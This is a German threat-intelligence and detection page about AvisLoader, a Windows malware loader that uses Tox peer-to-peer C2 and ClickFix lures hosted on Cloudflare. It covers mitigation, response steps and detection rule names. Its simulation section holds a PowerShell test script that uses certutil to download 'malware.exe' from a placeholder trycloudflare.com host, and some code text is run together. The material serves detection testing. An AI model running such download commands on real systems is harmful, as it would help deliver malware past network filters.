AvisLoader taucht als robuster Malware-Loader für Windows auf
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
AvisLoader ist ein neu identifizierter Windows-Malware-Loader, der das Tox-Peer-to-Peer (P2P)-Messaging-Netzwerk für die Command-and-Control (C2)-Kommunikation verwendet. Dieser dezentrale Ansatz ermöglicht es den Betreibern, die Konnektivität aufrechtzuerhalten und Controller zu verlagern, ohne auf feste Domains oder zentrale Server angewiesen zu sein. Die Malware wird häufig durch ClickFix-Social-Engineering-Lockmittel verteilt, die auf der Cloudflare-Infrastruktur gehostet werden.
Untersuchung
Das Varonis Threat Labs entdeckte den Loader auf einem offenen Staging-Server zusammen mit seinem Befehlszentrum und zugehörigen Tools. Die Untersuchung identifizierte ein DocuSign-gestaltetes ClickFix-Lockmittel, das Benutzer anweist, Befehle auszuführen, die Nutzdaten über Cloudflare Quick Tunnels abrufen. Die Analyse der ausführbaren Datei ergab Tox-basierte C2-Kommunikation, UAC-Bypass-Funktionalität und Module, die darauf ausgelegt sind, bösartige Prozesse zu verbergen.
Minderung
Organisationen sollten Benutzer schulen, Dokumenten-Signaturen zu erkennen und zu melden, die sie auffordern, Befehle in Terminals oder den Windows-Ausführen-Dialog einzugeben. Sicherheitsteams sollten die verdächtige Nutzung von Cloudflare Workers und Quick Tunnels in webbasierten Lockmitteln überwachen. Die Erkennung unerwarteten Peer-to-Peer (P2P)-Netzwerkverkehrs und unautorisierter Änderungen an Desktop-Verknüpfungen kann ebenfalls dazu beitragen, das Risiko zu verringern.
Antwort
Wenn Aktivitäten von AvisLoader erkannt werden, sollten Sicherheitsteams die Prozessherkunft von nach Besuchen auf verdächtigen Domains gestarteten Befehlszeilen und Skript-Interpretern überprüfen. Endpunkte auf modifizierte Verknüpfungen untersuchen, .backup Dateien, und das VLCAssistant Artefakt. Auch die Netzwerktelemetrie sollte auf ungewöhnlichen Tox-Protokollverkehr überprüft werden, der von betroffenen Hosts ausgeht.
Angriffsablauf
Wir aktualisieren diesen Teil noch.
Erkennungen
Verdächtige ausführbare Datei mit nur Zahlen im Namen (über cmdline)
Verdächtige Trycloudflare-Domänenkommunikation (über dns)
Verdächtiger Curl-Ausführungsversuch [MacOS] (über cmdline)
IOCs (HashSha256) zur Erkennung: Meet AvisLoader: Ein Windows-Loader, der einen Takedown überdauern soll
Unerwarteten Tox- oder Peer-to-Peer-Verkehr erkennen [Windows Netzwerkverbindung]
Erkennung von Remote-Code-Ausführung über Befehlszeilen und Cloudflare Quick Tunnel [Windows Prozess-Erstellung]
Simulation-Ausführung
-
Angriffserzählung & Befehle: Ein Angreifer hat sich initialen Zugang zu einem Arbeitsrechner verschafft. Um Persistenz aufrechtzuerhalten und seine sekundäre modulare Nutzlast herunterzuladen, nutzt er einen Cloudflare Quick Tunnel, um Egress-Filtering zu umgehen. Der Angreifer verwendet
certutil.exe, ein integriertes Windows-Dienstprogramm, um die Nutzlast vonhttps://malicious-tunnel-id.trycloudflare.com/payload.exeherunterzuladen. Diese Methode wird gewählt, weilcertutileine vertrauenswürdige binäre Datei ist und der Datenverkehr scheinbar zu einer legitimen Cloudflare-Infrastruktur führt, wodurch es weniger wahrscheinlich ist, dass er von grundlegenden Netzwerk-Reputationsfiltern markiert wird. -
Regression-Testskript:
# Simulationsskript zur Auslösung der Erkennungsregel. # Dieses verwendet certutil, um einen Download von einer trycloudflare.com-Adresse zu versuchen. $targetUrl = "https://fake-tunnel-id-1234.trycloudflare.com/malware.exe" Write-Host "[*] Adversary-Aktivität simulieren: Herunterladen von $targetUrl über certutil..." # Der folgende Befehl soll die Bedingungen 'selection_tunnel' UND 'selection_tools' auslösen. certutil.exe -urlcache -split -f "$targetUrl" "$env:TEMPmalware.exe" if ($LASTEXITCODE -eq 0) { Write-Host "[+] Simulationsbefehl erfolgreich ausgeführt." } else { Write-Host "[-] Befehl fehlgeschlagen (Erwartet, wenn die URL nicht vorhanden ist, aber Telemetrie sollte trotzdem generiert werden)." } -
Bereinigungskommandos:
# Bereinigungsskript, um die simulierte Nutzlast und lokale Artefakte zu entfernen. $tempFile = "$env:TEMPmalware.exe" if (Test-Path $tempFile) { Remove-Item -Path $tempFile -Force Write-Host "[+] $tempFile bereinigt" } else { Write-Host "[-] Kein zu bereinigendes Artefakt gefunden." }